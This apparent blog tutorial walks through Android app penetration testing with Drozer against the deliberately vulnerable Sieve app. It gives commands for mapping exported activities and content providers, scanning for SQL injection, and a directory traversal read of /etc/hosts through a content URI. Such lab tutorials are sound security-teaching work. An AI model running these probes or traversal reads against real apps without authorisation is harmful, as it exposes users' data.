Android Pentest with Drozer

0xLeeBai
3 min readJul 23, 2023

--

What is Drozer?

Drozer is a free and powerful android pentest tool that can be used for dynamic analysis for android application security assessment.

[Windows 10] My lab setup

I perform my android pentest on my windows 10 host machine, the following are my setups:

  1. Python v2.7
  2. Drozer v2.4.4
  3. Other dependencies
pip install protobuf
pip install PyOpenssl
pip install twisted
pip install service_identity

4. Drozer agent v2.3.4 apk

  • install drozer-agent.apk into android emulator

5. Nox player (android emulator)

6. Sieve apk (vulnerable application)

[CMD] Start a drozer session

  1. open drozer-agent application inside android emulator, toggle it on.

2. open CMD inside windows host machine, type the following to establish communication between drozer and drozer-agent.

adb forward tcp:31415 tcp:31415

3. open CMD inside windows host machine, type the following to start drozer.

drozer console connect

[Drozer] Find the package name of the vulnerable application

run app.package.list -f <string>

[Drozer] Show package information

run app.package.info -a <package_name>

[Drozer] Identify attack surface

run app.package.attacksurface <package_name>

[Drozer] Exploit exported activities

List exported activities

run app.activity.info -a <package_name>

Invoke exported activities

run app.activity.start -a <package_name> <exported_activity_name>

[Drozer] Exploit exported content providers

Find accessible content URIs

run scanner.provider.finduris -a <package_name>

SQLi vulnerability

List accessible SQLi injection points and accessible content URIs.

run scanner.provider.injection -a <package_name>

Display SQL tables for the package name if it is vulnerable to SQLi.

run scanner.provider.sqltables -a <package_name>

[CRUD] query the content.

[CRUD] insert the content.

[CRUD] update the content.

[CRUD] delete the content.

Directory traversal vulnerability

List accessible content URIs that is vulnerable to directory traversal.

run scanner.provider.traversal -a <package_name>

Exploit directory traversal vulnerability.

run app.provider.read <content_uri>../../etc/hosts
run app.provider.read <content_uri>../../proc/cpuinfo

--

--

0xLeeBai

床前明月光,疑是地上霜。 举头望明月,低头思故乡。